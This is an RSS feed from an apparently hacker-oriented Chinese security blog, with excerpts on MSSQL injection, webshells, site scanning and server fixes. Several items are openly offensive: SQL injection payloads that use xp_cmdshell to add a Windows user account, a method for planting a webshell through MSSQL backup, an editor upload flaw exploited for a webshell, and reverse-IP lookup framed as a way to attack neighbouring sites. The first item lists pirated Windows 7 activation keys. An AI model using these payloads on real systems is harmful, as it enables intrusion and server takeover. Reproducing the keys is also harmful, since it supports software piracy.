<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>无忧安全网</title><link>http://www.51safe.net/</link><description>专注系统安全，专注网络安全，专注黑客技术</description><generator>RainbowSoft Studio Z-Blog 1.8 Arwen Build 90619</generator><language>zh-CN</language><copyright>关于本站 | 安全业务 | 联系我们 | 广告服务 | 友情链接 | 加入收藏夹Copyright 2008-2010 无忧安全网 All rights reserved.Powered By Z-BlogICP备案编号:闽ICP备09054386号&amp;amp;nbsp;</copyright><pubDate>Thu, 17 Feb 2011 15:03:19 +0800</pubDate><item><title>win7神KEY激活成功</title><author>freboys@163.com (freboys)</author><link>http://www.51safe.net/article/Skills/win7.htm</link><pubDate>Thu, 10 Dec 2009 23:26:23 +0800</pubDate><guid>http://www.51safe.net/article/Skills/win7.htm</guid><description><![CDATA[<p>安装了64位的WIN7系统，使用神KEY激活成功，人品暴好。</p><p>发一组win7神Key</p><blockquote><p>236TW-X778T-8MV9F-937GT-QVKBB <br />KH2J9-PC326-T44D4-39H6V-TVPBY <br />TFP9Y-VCY3P-VVH3T-8XXCC-MF4YK<br />J783Y-JKQWR-677Q8-KCXTF-BHWGC <br />C4M9W-WPRDG-QBB3F-VM9K8-KDQ9Y <br />2VCGQ-BRVJ4-2HGJ2-K36X9-J66JG <br />MGX79-TPQB9-KQ248-KXR2V-DHRTD <br />FJHWT-KDGHY-K2384-93CT7-323RC</p></blockquote><p>&nbsp;激活的时候，可以多试几次，看看运气如何。</p>]]></description><category>经验技巧</category><comments>http://www.51safe.net/article/Skills/win7.htm#comment</comments><wfw:comment>http://www.51safe.net/</wfw:comment><wfw:commentRss>http://www.51safe.net/feed.asp?cmt=48</wfw:commentRss><trackback:ping>http://www.51safe.net/cmd.asp?act=tb&amp;id=48&amp;key=51a66da7</trackback:ping></item><item><title>mssql注入经常使用的命令</title><author>freboys@163.com (freboys)</author><link>http://www.51safe.net/article/Skills/mssql-injection-conmmand.htm</link><pubDate>Sat, 28 Nov 2009 09:00:08 +0800</pubDate><guid>http://www.51safe.net/article/Skills/mssql-injection-conmmand.htm</guid><description><![CDATA[<p>①、是否存在xp_cmdshell</p><blockquote><p>and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')</p></blockquote><p>②、用xp_cmdshell执行命令</p><blockquote><p>;exec master..xp_cmdshell &quot;net user name password /add&quot;-- <br />...</p>]]></description><category>经验技巧</category><comments>http://www.51safe.net/article/Skills/mssql-injection-conmmand.htm#comment</comments><wfw:comment>http://www.51safe.net/</wfw:comment><wfw:commentRss>http://www.51safe.net/feed.asp?cmt=47</wfw:commentRss><trackback:ping>http://www.51safe.net/cmd.asp?act=tb&amp;id=47&amp;key=7e7a8292</trackback:ping></item><item><title>JSP探针-虚拟主机JSP环境检测工具</title><author>freboys@163.com (freboys)</author><link>http://www.51safe.net/article/tools/jspcheck.htm</link><pubDate>Fri, 27 Nov 2009 23:28:22 +0800</pubDate><guid>http://www.51safe.net/article/tools/jspcheck.htm</guid><description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 服务器配置好了JSP环境，需要测试一下配置是否正确，下面的代码可以用来侦测JSP主机的运行环境，例如操作系统、JDK版本、Servlet/JSP容器等信息。</p>]]></description><category>常用工具</category><comments>http://www.51safe.net/article/tools/jspcheck.htm#comment</comments><wfw:comment>http://www.51safe.net/</wfw:comment><wfw:commentRss>http://www.51safe.net/feed.asp?cmt=46</wfw:commentRss><trackback:ping>http://www.51safe.net/cmd.asp?act=tb&amp;id=46&amp;key=6d56d2ce</trackback:ping></item><item><title>Web Disk Manager网页版文件浏览器</title><author>freboys@163.com (freboys)</author><link>http://www.51safe.net/article/Program/Web-Disk-Manager.htm</link><pubDate>Thu, 26 Nov 2009 23:58:54 +0800</pubDate><guid>http://www.51safe.net/article/Program/Web-Disk-Manager.htm</guid><description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;网页版文件浏览器，完全模仿Windows文件管理器，小巧，清爽。</p>]]></description><category>程序设计</category><comments>http://www.51safe.net/article/Program/Web-Disk-Manager.htm#comment</comments><wfw:comment>http://www.51safe.net/</wfw:comment><wfw:commentRss>http://www.51safe.net/feed.asp?cmt=45</wfw:commentRss><trackback:ping>http://www.51safe.net/cmd.asp?act=tb&amp;id=45&amp;key=0b706f48</trackback:ping></item><item><title>WinWebMail只能发信不能收信一次解决过程</title><author>freboys@163.com (freboys)</author><link>http://www.51safe.net/article/Skills/WinWebMail-Can-Send-Can't-Receive.htm</link><pubDate>Thu, 26 Nov 2009 23:50:30 +0800</pubDate><guid>http://www.51safe.net/article/Skills/WinWebMail-Can-Send-Can't-Receive.htm</guid><description><![CDATA[<blockquote><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;环境：windows2003 sp2+WinWebMail 3.8.0.1+Symantec杀毒</p></blockquote><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;使用很久的WinWebMail邮件服务器，实然出现了只能发信不能收信的故障，在排除了POP3和SMTP服务的问题后，通过系统命令Nslookup检查出域名的MX（邮件交换记录）解析错误所致，重新解析域名的MX记录，问题完美解决！</p>]]></description><category>经验技巧</category><comments>http://www.51safe.net/article/Skills/WinWebMail-Can-Send-Can't-Receive.htm#comment</comments><wfw:comment>http://www.51safe.net/</wfw:comment><wfw:commentRss>http://www.51safe.net/feed.asp?cmt=44</wfw:commentRss><trackback:ping>http://www.51safe.net/cmd.asp?act=tb&amp;id=44&amp;key=7c641162</trackback:ping></item><item><title>目录扫描工具wwwscan</title><author>freboys@163.com (freboys)</author><link>http://www.51safe.net/article/tools/wwwscan.htm</link><pubDate>Wed, 25 Nov 2009 10:59:35 +0800</pubDate><guid>http://www.51safe.net/article/tools/wwwscan.htm</guid><description><![CDATA[<p>&nbsp;&nbsp; &nbsp; &nbsp;扫描网站目录很好的一个工具，目录数据库已做了大量的优化。自己可以扩展自己的目录库，只要将对应的目录添加到cgi.list这个文件里就可以了。些工具在命令提示符下运行。</p><p>&nbsp;</p><blockquote><p>&lt;Usage&gt;: &nbsp;wwwscan.exe &lt;HostName|Ip&gt; [Options]</p><p>&lt;Options&gt;:</p><p>&nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;-p port &nbsp; &nbsp; &nbsp; &nbsp;: set http/https port</p>...</blockquote>]]></description><category>常用工具</category><comments>http://www.51safe.net/article/tools/wwwscan.htm#comment</comments><wfw:comment>http://www.51safe.net/</wfw:comment><wfw:commentRss>http://www.51safe.net/feed.asp?cmt=43</wfw:commentRss><trackback:ping>http://www.51safe.net/cmd.asp?act=tb&amp;id=43&amp;key=2571eabb</trackback:ping></item><item><title>IP地址反查，查询同IP绑定站点数量</title><author>freboys@163.com (freboys)</author><link>http://www.51safe.net/article/tools/reverse-ip-domain-neighbors.htm</link><pubDate>Wed, 25 Nov 2009 10:32:29 +0800</pubDate><guid>http://www.51safe.net/article/tools/reverse-ip-domain-neighbors.htm</guid><description><![CDATA[<p>　　玩黑的朋友都知道旁注。旁注，顾名思义是从旁注入，也就是说同从一台服务器的其它站上下手，来达到我们入侵的目的。但是如何知道同一台服务器挂了多少个网站呢？有一些网站专门提供了这种功能，即通过IP或者域名可以查询出这台服务器中绑定的域名数量。同时通过这种方法，我们在选购虚拟主机空间时可以做相关参考，因为服务器中用户太多就会影响自己网站的网速，甚至会对自己的网站的安全存在威胁。所以你在购买虚拟主机的时候，也不妨先查查其同台服务器中放置网站的个数。</p><p>　　下面列出的这些网站，是我平时用的比较多的IP地址反查网站。</p><p>...</p>]]></description><category>常用工具</category><comments>http://www.51safe.net/article/tools/reverse-ip-domain-neighbors.htm#comment</comments><wfw:comment>http://www.51safe.net/</wfw:comment><wfw:commentRss>http://www.51safe.net/feed.asp?cmt=42</wfw:commentRss><trackback:ping>http://www.51safe.net/cmd.asp?act=tb&amp;id=42&amp;key=c73b8d24</trackback:ping></item><item><title>ZBlog如何统计浏览次数和显示浏览次数</title><author>freboys@163.com (freboys)</author><link>http://www.51safe.net/article/Skills/zblog-Count-views.htm</link><pubDate>Tue, 24 Nov 2009 09:08:38 +0800</pubDate><guid>http://www.51safe.net/article/Skills/zblog-Count-views.htm</guid><description><![CDATA[<p>　　这几天模板修改了，没有过多的检查，今天早上一看Blog，怎么每篇文章的浏览次数没有增加，每天怎么说也有几个人浏览，怎么这个统计没有增加呢？于是跟正常的Blog做了对比，发现原来模板里改的有点问题，修复一下就可以了，修复过程如下：</p><p>　　确保在模板文件夹TEMPLATE下的 default.html,single.html,catalog.html 等页面的头部有如下代码：</p><blockquote>头部代码：<p>&lt;script&nbsp; type=&quot;text/javascript&quot;&gt;<br />...</p></blockquote>]]></description><category>经验技巧</category><comments>http://www.51safe.net/article/Skills/zblog-Count-views.htm#comment</comments><wfw:comment>http://www.51safe.net/</wfw:comment><wfw:commentRss>http://www.51safe.net/feed.asp?cmt=41</wfw:commentRss><trackback:ping>http://www.51safe.net/cmd.asp?act=tb&amp;id=41&amp;key=69b16834</trackback:ping></item><item><title>MSN Editor网页编辑器漏洞</title><author>freboys@163.com (freboys)</author><link>http://www.51safe.net/article/bugs/MSN-Editor-Bugs.htm</link><pubDate>Tue, 24 Nov 2009 00:09:08 +0800</pubDate><guid>http://www.51safe.net/article/bugs/MSN-Editor-Bugs.htm</guid><description><![CDATA[<p>　　MSN Editor网页编辑器是一个比较简陋，没有管理后台的编辑器。正因为他功能简单，所以给我们得到webshell带来一定的难道。但是它的图片上传程序存在利用的漏洞，那就是对于修改修改上传图片文件名处理不当，导致我们可以完美的利用IIS6文件解析漏洞拿到webshell。</p><p><img title="MSN Editor网页编辑器" alt="MSN Editor网页编辑器" onload="ResizeImage(this,520)" src="http://www.51safe.net/upload/200911240042257234.jpg" /></p>]]></description><category>漏洞收集</category><comments>http://www.51safe.net/article/bugs/MSN-Editor-Bugs.htm#comment</comments><wfw:comment>http://www.51safe.net/</wfw:comment><wfw:commentRss>http://www.51safe.net/feed.asp?cmt=40</wfw:commentRss><trackback:ping>http://www.51safe.net/cmd.asp?act=tb&amp;id=40&amp;key=11a6591b</trackback:ping></item><item><title>Mssql备份得webshell突破特殊字符限制</title><author>freboys@163.com (freboys)</author><link>http://www.51safe.net/article/Skills/Mssql-backup-a-webshell.htm</link><pubDate>Sat, 21 Nov 2009 08:55:55 +0800</pubDate><guid>http://www.51safe.net/article/Skills/Mssql-backup-a-webshell.htm</guid><description><![CDATA[<p><strong>1.插入数据</strong></p><p>mssql注射使用Backup或makewebtask得到webshell，在写入webshell代码时，如果过滤了一些特殊字符，如&quot; '等。我们先mssql分析器里&ldquo;查询&rdquo;： <br /><br />use pubs; &lt;===使用数据哭pubs <br />create table cmd (str image); &lt;===建立个表cmd 一个属性为image的列 <br />...</p>]]></description><category>经验技巧</category><comments>http://www.51safe.net/article/Skills/Mssql-backup-a-webshell.htm#comment</comments><wfw:comment>http://www.51safe.net/</wfw:comment><wfw:commentRss>http://www.51safe.net/feed.asp?cmt=39</wfw:commentRss><trackback:ping>http://www.51safe.net/cmd.asp?act=tb&amp;id=39&amp;key=646cfaea</trackback:ping></item></channel></rss>

